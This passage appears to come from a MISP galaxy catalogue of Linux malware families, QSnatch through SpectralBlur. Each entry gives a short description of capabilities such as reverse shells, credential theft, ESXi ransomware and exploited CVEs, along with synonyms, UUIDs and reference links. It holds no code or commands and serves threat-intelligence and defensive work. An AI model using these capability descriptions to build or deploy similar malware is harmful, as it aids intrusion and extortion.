- https://www.anomali.com/blog/the-ech0raix-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QSnatch
The malware infects QNAP NAS devices, persists via various mechanisms and resists cleaning by preventing firmware updates and interfering with QNAP MalwareRemover. The malware steals passwords and hashes.
Internal MISP references
UUID 48389957-30e2-4747-b4c6-8b8a9f15250f
which can be used as unique global reference for QSnatch
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch - webarchive
- https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html - webarchive
- https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf - webarchive
- https://bin.re/blog/the-dga-of-qsnatch/ - webarchive
- https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices - webarchive
- https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-209a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QUIETEXIT
Mandiant observed this backdoor being used by UNC3524. It is based on the open-source Dropbear SSH source code.
Internal MISP references
UUID 6a5ab9ca-944c-4187-bdef-308516745d18
which can be used as unique global reference for QUIETEXIT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
r2r2
Internal MISP references
UUID 759f8590-a049-4c14-be8a-e6605e2cd43d
which can be used as unique global reference for r2r2
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RagnarLocker (ELF)
Internal MISP references
UUID 5f96787e-fc9f-486b-a15f-f46c8179a4d5
which can be used as unique global reference for RagnarLocker (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ragnarlocker - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://techcrunch.com/2023/10/20/ragnarlocker-ransomware-dark-web-portal-seized-in-international-sting/?guccounter=1 - webarchive
- https://twitter.com/malwrhunterteam/status/1475568201673105409 - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rakos
Internal MISP references
UUID 4592384c-48a7-4e16-b492-7add50a7d2f5
which can be used as unique global reference for Rakos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RansomEXX (ELF)
According to SentinelOne, RansomEXX (aka Defray, Defray777), a multi-pronged extortion threat, has been observed in the wild since late 2020. RansomEXX is associated with attacks against the Texas Department of Transportation, Groupe Atlantic, and several other large enterprises. There are Windows and Linux variants of this malware family, and they are known for their limited and exclusive targeting.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RansomEXX (ELF).
Known Synonyms |
---|
Defray777 |
Internal MISP references
UUID 946814a1-957c-48ce-9068-fdef24a025bf
which can be used as unique global reference for RansomEXX (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/ - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.ic3.gov/Media/News/2021/211101.pdf - webarchive
- https://www.sentinelone.com/anthology/ransomexx/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/ - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.youtube.com/watch?v=qxPXxWMI2i4 - webarchive
- https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195 - webarchive
- https://securityintelligence.com/x-force/ransomexx-upgrades-rust/ - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RansomExx2
According to IBM Security X-Force, this is a new but functionally very similar version of RansomExx, fully rewritten in Rust and internally referred to as RansomExx2.
Internal MISP references
UUID c6d750d5-fa47-4fcb-9d24-2682036fc6e5
which can be used as unique global reference for RansomExx2
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RapperBot
A Mirai derivative brute-forcing SSH servers.
Internal MISP references
UUID 914c94eb-38e2-4cb8-a62b-21fbe9c48496
which can be used as unique global reference for RapperBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.rapper_bot - webarchive
- https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery - webarchive
- https://socradar.io/linux-malware-rapperbot-brute-forcing-ssh-servers/ - webarchive
- https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RaspberryPiBotnet
Internal MISP references
UUID 8dee025b-2233-4cd8-af02-fcdcd40b378f
which can be used as unique global reference for RaspberryPiBotnet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
rat_hodin
Internal MISP references
UUID 6aacf515-de49-4afc-a135-727c9beaab0b
which can be used as unique global reference for rat_hodin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
rbs_srv
Internal MISP references
UUID a08d9f8b-2cc5-48c2-8cce-ee713bcdc4b7
which can be used as unique global reference for rbs_srv
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedTail
RedTail is a cryptomining malware, which is based on the open-source XMRIG mining software. It is being spread via known vulnerabilities such as:
- CVE-2024-3400
- CVE-2023-46805
- CVE-2024-21887
- CVE-2023-1389
- CVE-2022-22954
- CVE-2018-20062
Internal MISP references
UUID ba89a509-ff8e-446b-867c-7f15efe0477f
which can be used as unique global reference for RedTail
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedXOR
RedXOR is a sophisticated backdoor targeting Linux systems, disguised as a polkit daemon and utilizing network data encoding based on XOR. Believed to be developed by Chinese nation-state actors, this malware shows similarities to other malware associated with the Winnti umbrella threat group.
RedXOR uses various techniques such as open-source LKM rootkits, Python pty shell, and network data encoding with XOR. It also employs persistence methods and communication with a Command and Control server over HTTP.
The malware can execute various commands including system information collection, updates, shell commands, and network tunneling.
Internal MISP references
UUID 421b2ec7-d4e6-4fc8-9bd3-55fe26337aae
which can be used as unique global reference for RedXOR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RedAlert Ransomware
Ransomware that targets Linux VMware ESXi servers. Encryption procedure uses the NTRUEncrypt public-key encryption algorithm.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedAlert Ransomware.
Known Synonyms |
---|
N13V |
Internal MISP references
UUID 12137c8d-d3f4-44fe-b25e-2fb5f90cecce
which can be used as unique global reference for RedAlert Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.red_alert - webarchive
- https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/ - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rekoobe
A Trojan for Linux intended to infect SPARC machines as well as Intel x86 and x86-64 computers. The Trojan's configuration data is stored in a file encrypted with the XOR algorithm.
Internal MISP references
UUID 48b9a9fd-4c1a-428a-acc0-40b1a3fa7590
which can be used as unique global reference for Rekoobe
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt - webarchive
- https://hunt.io/blog/rekoobe-backdoor-discovered-in-open-directory-possibly-targeting-tradingview-users - webarchive
- https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/ - webarchive
- https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/ - webarchive
- https://asec.ahnlab.com/en/55229/ - webarchive
- https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/ - webarchive
- https://vms.drweb.com/virus/?i=7754026&lng=en - webarchive
- https://sansec.io/research/rekoobe-fishpig-magento - webarchive
- https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/ - webarchive
- https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/ - webarchive
- https://twitter.com/billyleonard/status/1458531997576572929 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
reptile
Internal MISP references
UUID 934478a1-1243-4c26-8360-be3d01ae193e
which can be used as unique global reference for reptile
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile - webarchive
- https://asec.ahnlab.com/en/55785/ - webarchive
- https://github.com/f0rb1dd3n/Reptile - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf - webarchive
- https://dfir.ch/posts/reptile_launcher/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
REvil (ELF)
ELF version of win.revil targeting VMware ESXi hypervisors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REvil (ELF).
Known Synonyms |
---|
REvix |
Internal MISP references
UUID d9d76456-01a3-4dcd-afc2-87529e00c1ba
which can be used as unique global reference for REvil (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil - webarchive
- https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/ - webarchive
- https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/ - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.youtube.com/watch?v=ptbNMlWxYnE - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://malienist.medium.com/revix-linux-ransomware-d736956150d0 - webarchive
- https://home.treasury.gov/news/press-releases/jy0471 - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom - webarchive
- https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://www.flashpoint-intel.com/blog/revil-disappears-again/ - webarchive
- https://threatpost.com/ransomware-revil-sites-disappears/167745/ - webarchive
- https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa - webarchive
- https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version - webarchive
- https://www.bbc.com/news/technology-59297187 - webarchive
- https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/ - webarchive
- https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo - webarchive
- https://ke-la.com/will-the-revils-story-finally-be-over/ - webarchive
- https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil - webarchive
- https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil - webarchive
- https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/ - webarchive
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - webarchive
- https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/ - webarchive
- https://twitter.com/IntezerLabs/status/1452980772953071619 - webarchive
- https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/ - webarchive
- https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend - webarchive
- https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5 - webarchive
- https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released - webarchive
- https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf - webarchive
- https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment - webarchive
- https://twitter.com/VK_Intel/status/1409601311092490248 - webarchive
- https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/ - webarchive
- https://github.com/f0wl/REconfig-linux - webarchive
- https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021 - webarchive
- https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.youtube.com/watch?v=mDUMpYAOMOo - webarchive
- https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf - webarchive
- https://angle.ankura.com/post/102hcny/revix-linux-ransomware - webarchive
- https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya - webarchive
- https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html - webarchive
- https://twitter.com/VK_Intel/status/1409601311092490248?s=20 - webarchive
- https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20 - webarchive
- http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html - webarchive
- https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/ - webarchive
- https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/ - webarchive
- https://analyst1.com/file-assets/History-of-REvil.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rex
Internal MISP references
UUID 49639ff5-e0be-4b6a-850b-d5d8dd37e62b
which can be used as unique global reference for Rex
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RHOMBUS
Internal MISP references
UUID af886910-9a0b-478e-b53d-54c8a103acb4
which can be used as unique global reference for RHOMBUS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rhysida (ELF)
Internal MISP references
UUID 1dbd7cbb-960d-4ef4-9520-1748fb7cd4c6
which can be used as unique global reference for Rhysida (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Roboto
P2P botnet discovered by Netlab360. The botnet infects Linux servers via the Webmin RCE vulnerability (CVE-2019-15107), which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlab360 analysis, the botnet serves mainly seven functions: reverse shell, self-uninstall, gathering process network information, gathering bot information, executing system commands, running encrypted files specified by URLs, and four DDoS attack methods: ICMP flood, HTTP flood, TCP flood, and UDP flood.
Internal MISP references
UUID e18bf514-b978-4bef-b4d9-834a5100fced
which can be used as unique global reference for Roboto
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RotaJakiro
RotaJakiro is a stealthy Linux backdoor which remained undetected between 2018 and 2021. The malware uses rotating encryption for both the resource information embedded within the sample and its C2 communication, combining AES, XOR and ROTATE encryption with ZLIB compression.
Internal MISP references
UUID 66fb7b48-60f2-44fc-9cbe-f70e776d058b
which can be used as unique global reference for RotaJakiro
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro - webarchive
- https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/ - webarchive
- https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro - webarchive
- https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Royal Ransom (ELF)
According to Trend Micro, Royal ransomware was first observed in September 2022, and the threat actors behind it are believed to be seasoned cybercriminals who used to be part of Conti Team One.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Royal Ransom (ELF).
Known Synonyms |
---|
Royal |
Royal_unix |
Internal MISP references
UUID 4e29dae1-5a8c-4b3c-81dc-dcc0fdd3c93a
which can be used as unique global reference for Royal Ransom (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.royal_ransom - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://unit42.paloaltonetworks.com/royal-ransomware/ - webarchive
- https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rshell
Internal MISP references
UUID 4947e9d3-aa13-4359-ac43-c1c436c409c9
which can be used as unique global reference for Rshell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RudeDevil
Internal MISP references
UUID 923ee959-4ea5-46c5-8926-84e41ca77ca4
which can be used as unique global reference for RudeDevil
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SALTWATER
According to Mandiant, SALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality. SALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling capabilities. The backdoor is implemented using hooks on the send, recv and close syscalls via the third-party kubo/funchook hooking library, and amounts to five components, most of which are referred to as "Channels" within the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic backdoor functionality.
Internal MISP references
UUID d55ea436-b2c1-400c-99dc-6e35bc05438b
which can be used as unique global reference for SALTWATER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Satori
Satori is a variant of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploits to spread in a worm-like fashion over ports 37215 and 52869 (CVE-2014-8361).
Internal MISP references
UUID 9e5d83a8-1181-43fe-a77f-28c8c75ffbd0
which can be used as unique global reference for Satori
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori - webarchive
- https://www.arbornetworks.com/blog/asert/the-arc-of-satori/ - webarchive
- https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/ - webarchive
- https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/ - webarchive
- http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori - webarchive
- http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/ - webarchive
- http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/ - webarchive
- https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SBIDIOT
Internal MISP references
UUID b4c20cf4-8e94-4523-8d48-7781aab6785d
which can be used as unique global reference for SBIDIOT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sbidiot - webarchive
- https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/ - webarchive
- https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/ - webarchive
- https://brianstadnicki.github.io/posts/malware-sbidiot-dec2021/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SEASPY
According to CISA, this malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. The malware is designed to listen for commands received from the threat actor's command-and-control server through TCP packets. When executed, the malware uses a libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (SMTP) and TCP port 587. It checks each captured network packet for a hard-coded string. When the right sequence of packets is captured, it establishes a TCP reverse shell to the C2 server for further exploitation. This allows the threat actor to execute arbitrary commands on the compromised system. The malware is based on an open-source backdoor program named "cd00r".
Internal MISP references
UUID a6699c42-69d8-4bdd-8dd9-72f4c80efefa
which can be used as unique global reference for SEASPY
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.seaspy - webarchive
- https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors - webarchive
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
- https://www.cisa.gov/news-events/analysis-reports/ar23-209b - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
sedexp
Internal MISP references
UUID 4e71e8ab-a34a-494f-814d-cc983a2de463
which can be used as unique global reference for sedexp
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ShellBind
Internal MISP references
UUID b51caf06-736e-46fc-9b13-48b0b81df4b7
which can be used as unique global reference for ShellBind
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Shishiga
Internal MISP references
UUID 51da734c-70dd-4337-ab08-ab61457e0da5
which can be used as unique global reference for Shishiga
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SideWalk (ELF)
Internal MISP references
UUID ec994efc-a8a4-4e92-ada2-e37d421baf01
which can be used as unique global reference for SideWalk (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sidewalk - webarchive
- https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/ - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
- https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Silex
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silex.
Known Synonyms |
---|
silexbot |
Internal MISP references
UUID bf059cb4-f73a-4181-bf71-d8da7bf50dd8
which can be used as unique global reference for Silex
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SimpleTea (ELF)
SimpleTea for Linux is an HTTP(S) RAT.
It was discovered in Q1 2023 as an instance of the Lazarus group's Operation DreamJob campaign for Linux. It was a payload downloaded in an execution chain which started with an HSBC-themed job offer lure. It shared the same C&C server as payloads from the 3CX incident around the same time.
It is an object-oriented project, which does not run on Linux distributions without a graphical user interface, and decrypts its configuration from /home/%user%/.config/apdl.cf using 0x7E as the XOR key. It uses AES-GCM for encryption and decryption of its network traffic.
It supports basic commands that include operations on the victim's filesystem, manipulation of its configuration, file exfiltration (via ZIP archives), and the download and execution of additional tools from the attacker's arsenal. The commands are indexed by 16-bit integers, starting with the value 0x27C3.
SimpleTea for Linux seems like an updated version of BadCall for Linux, rewritten from C to C++, as there are similarities in class names and function names between the two.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SimpleTea (ELF).
Known Synonyms |
---|
PondRAT |
SimplexTea |
Internal MISP references
UUID e8695701-8055-4b98-bcb6-e4bb7e0a3346
which can be used as unique global reference for SimpleTea (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.simpletea - webarchive
- https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SLAPSTICK
According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.
Internal MISP references
UUID fb3e0a1d-3a98-4cbd-ad7f-4bbb4b9a8351
which can be used as unique global reference for SLAPSTICK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SnappyTCP
According to PwC, SnappyTCP is a simple reverse shell for Linux/Unix systems, with variants for plaintext and TLS communication. SeaTurtle has used SnappyTCP at least between 2021 and 2023.
Internal MISP references
UUID 72e045be-eba2-4571-9c6e-7d35add3d2f8
which can be used as unique global reference for SnappyTCP
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.snappy_tcp - webarchive
- https://www.huntandhackett.com/blog/turkish-espionage-campaigns - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html - webarchive
- https://blog.strikeready.com/blog/pivoting-through-a-sea-of-indicators-to-spot-turtles/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SoWaT
This is an implant used by APT31 on home routers to utilize them as ORBs.
Internal MISP references
UUID c2866996-d622-4ee2-b548-a6598836e5ae
which can be used as unique global reference for SoWaT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.sowat - webarchive
- https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003 - webarchive
- https://twitter.com/billyleonard/status/1417910729005490177 - webarchive
- https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/ - webarchive
- https://twitter.com/bkMSFT/status/1417823714922610689 - webarchive
- https://imp0rtp3.wordpress.com/2021/11/25/sowat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Spamtorte
Internal MISP references
UUID 7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0
which can be used as unique global reference for Spamtorte
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpeakUp
Internal MISP references
UUID 3ccd3143-c34d-4680-94b9-2cc4fa4f86fa
which can be used as unique global reference for SpeakUp
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Specter
Internal MISP references
UUID b9ed5797-b591-4ca9-ba77-ce86308e333a
which can be used as unique global reference for Specter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter - webarchive
- https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/ - webarchive
- https://blog.netlab.360.com/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpectralBlur (ELF)
Internal MISP references
UUID a14e7ea4-668c-4990-a1a9-be99722f88f7
which can be used as unique global reference for SpectralBlur (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
